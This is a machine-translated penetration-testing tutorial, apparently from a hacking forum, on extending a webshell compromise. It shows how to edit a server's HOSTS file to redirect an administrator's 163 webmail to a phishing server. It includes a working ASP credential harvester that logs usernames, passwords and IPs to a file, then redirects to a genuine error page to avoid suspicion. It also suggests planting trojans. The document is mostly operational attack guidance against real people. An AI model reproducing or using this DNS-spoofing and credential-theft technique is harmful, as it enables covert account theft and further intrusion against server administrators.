Expanded results using DNS resolution principles

Leng fengge
+ ------------------------------- +
I. Question
During Penetration Testing, when we get webshell, we may encounter the following problems:
(1) When you get the WebShell and easily get the server System, but when you find that this server has no value, how can he expand his achievements when he is an independent server or cannot penetrate other hosts in the Intranet?
(2) We often have this idea. If the website administrator is cracked, it is likely to be similar to the system password or other key passwords, so we can use these as the basis for social engineering, it is also a question of how to expand your own results.
After all, one problem is how to expand the results. My idea is to first check what is the webpage record frequently accessed by the Administrator to log on to the server. If there is an email or other website, it would be better, we can modify its DNS resolution so that we can first access the configured page for phishing, or even directly mount a trojan. This is a common practice. of course, if the Administrator does not frequently access some websites through this browser, we can add a phishing or Trojan page in the website management background that we infiltrate. of course, what we are discussing today is a DNS Spoofing process for websites frequently accessed by administrators.
Ii. Principles
Speaking of the principle of DNS resolution, there may be a lot of knowledge involved. I don't want to talk so much about it in this article. We only care about the sequence of DNS resolution. The following figure is used to explain the problem. 01:

What do I mean by a simple explanation: This is the DNS name resolution process sequence diagram, according to the priority of the serial number, the steps are as follows:
<1> enter the URL from IE or ping the Domain Name
<2> check whether the local computer name is your own
<3> query system HOSTS file records C: \ windows \ system32 \ drivers \ etc \ hosts
<4> find the local DNS Server
<5> search by NetBIOS name cache
<6> find the relationship between the domain name and IP address on the WINS Server
<7> broadcast ask someone to tell me the ing between the domain name and IP address
<8> find the local LMHOST file (same directory as the HOSTS file)
In the eight steps, the resolution is completed as long as one step is successfully parsed. Here we have two options to modify, step 1 and Step 8, but considering the general situation, we generally only go to step 4, so we can modify HOSTS to implement DNS spoofing. The principle is simply described here.
Iii. Practice
I am worried that some of my friends will be seated, so I will not demonstrate the real environment. I set up DNS Spoofing in Window2003 built on a local Virtual Machine to implement account information for administrator 163 mailbox.
1. Set DNS Spoofing and modify the HOSTS file
Open c: \ windows \ system32 \ drivers \ etc \ hosts, 02:

192.168.11.11 is the server of your phishing page, and mail.163.com is the page frequently accessed by server administrators, that is, the website we want to cheat. After modification and persistence, ping and check whether the ing is completed. It also verifies whether the theory in our principles is correct. Result 03:

We found that ping mail.163.com has been forwarded to the server on our phishing page. Well, the key below is the design of the phishing page. Of course, the more realistic the success rate is, the higher. I used ASP to simulate the 163 logon interface and changed the action of this interface form to our local checklogin. asp. To be more realistic and prevent the administrator from being alert, we also need to construct an error page. Below are our main password record files:
+ ------------------------------- +
<%
'Get User Account
Mailuser = request. Form ("username")
'Get User Password
Mailpwd = request. Form ("password")
'The combination information is stored in the Variable
Mailinfo = mailinfo & "ClientIP :"& Request. servervariables ("Remote_Host") & "|"
Mailinfo = mailinfo & "MailUser :"& Mailuser & "@ 163.com | MailPwd :"& Mailpwd
'Composer creates the mail.txt file and obtains its physical path first.
Pwdtxt = server. mappath ("mail.txt")
'Use the FSO component to write txt
SetFso = server. CreateObject ("Scripting. FileSystemObject")
'Opentextfile: second parameter. If it is equal to 8, it indicates the append mode.
SetTxtfile = fso. OpenTextFile (pwdtxt, 8, true)
Txtfile. WriteLine (mailinfo)
Txtfile. Close
'After obtaining the password, it will be transferred to the real address of 163. Password error prompt page
Rurl = "http://email.163.com/errorpage/err_163.htm? ErrorType = 460 & errorUsername ="& Mailuser & "@ 163.com"
'Redirect immediately to the 163 webpage
Response. Redirect (rurl)
%>
+ ------------------------------- +
It is particularly important to note that the domain name email.163.com on the error page in rurl cannot be the same as the HOSTS file above. Otherwise, it will be resolved to the local directory and the file does not exist and an error is reported. This is mainly achieved by viewing aliases. You can get the alias through the side note, so that you can completely intercept the password. The concealment is better, because it is normal to lose the wrong password once or twice, which is not easy to cause management alert.
When the Administrator accesses mail.163.com on the server, he will access the IP server we set in advance. after entering the password, we will jump to the page when setting a Password error 163, after that, you can log on to the 163 mailbox, which is not easy to find. Some may say that if there is no alias? Of course this is not easy to do, but you can let him go to www.163.com, but it is not concealed.
Now, let's take full advantage of this practice.
Iv. Summary
Experience is often accumulated in the penetration process. This idea may be taken into consideration when the mountains and rivers are poor. This idea has many advantages. The whole process is easy to implement. You only need to modify the script or create a phishing page by yourself. Another application is to use it to get the Administrator's password. This is a good idea when we cannot crack the password. Finally, many of our network security fans, like me, are not familiar with kill-free, saving them the trouble of killing Trojans or some Elevation of Privilege tools. This article is just a way of thinking. Many of you should also think about it. I hope to point it out.